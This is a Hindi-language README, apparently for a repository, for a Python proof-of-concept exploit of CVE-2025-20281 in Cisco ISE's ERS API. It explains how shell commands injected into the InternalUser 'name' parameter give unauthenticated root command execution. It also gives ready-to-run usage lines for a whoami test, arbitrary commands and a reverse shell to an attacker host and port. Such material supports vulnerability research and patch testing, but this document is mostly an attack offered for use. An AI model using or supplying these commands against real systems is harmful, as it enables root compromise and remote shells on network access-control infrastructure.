
Cisco ISE ERS API में CVE-2025-20281 के लिए अप्रमाणित रिमोट कोड निष्पादन शोषण। रूट के रूप में कमांड निष्पादित करें या रिवर्स शेल लॉन्च करें — कोई प्रमाणीकरण आवश्यक नहीं।
यह रिपॉजिटरी CVE-2025-20281 के लिए एक Python 3 प्रूफ-ऑफ-कॉन्सेप्ट शोषण है, जो Cisco Identity Services Engine (ISE) में एक गंभीर भेद्यता है जो ERS API के माध्यम से रूट के रूप में अप्रमाणित रिमोट कोड निष्पादन (RCE) की अनुमति देती है।
Cisco ISE ERS का
/ers/sdk#_एंडपॉइंट उपयोगकर्ता निर्माण अनुरोधों को संसाधित करते समय प्रमाणीकरण को मान्य करने में विफल रहता है।
InternalUserऑब्जेक्ट केnameपैरामीटर में शेल कमांड इंजेक्ट करके, हमलावर रूट के रूप में कमांड निष्पादन प्राप्त कर सकते हैं।
--cmd)--whoami के साथ त्वरित परीक्षण--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Test command:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Run custom command:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Reverse shell:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ कानूनी अस्वीकरण
यह कोड केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस सॉफ्टवेयर का उपयोग उन नेटवर्क या सिस्टम के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।
भेद्यता: Cisco सलाहकार के माध्यम से खुलासा
PoC पुनर्लेखन: illdeed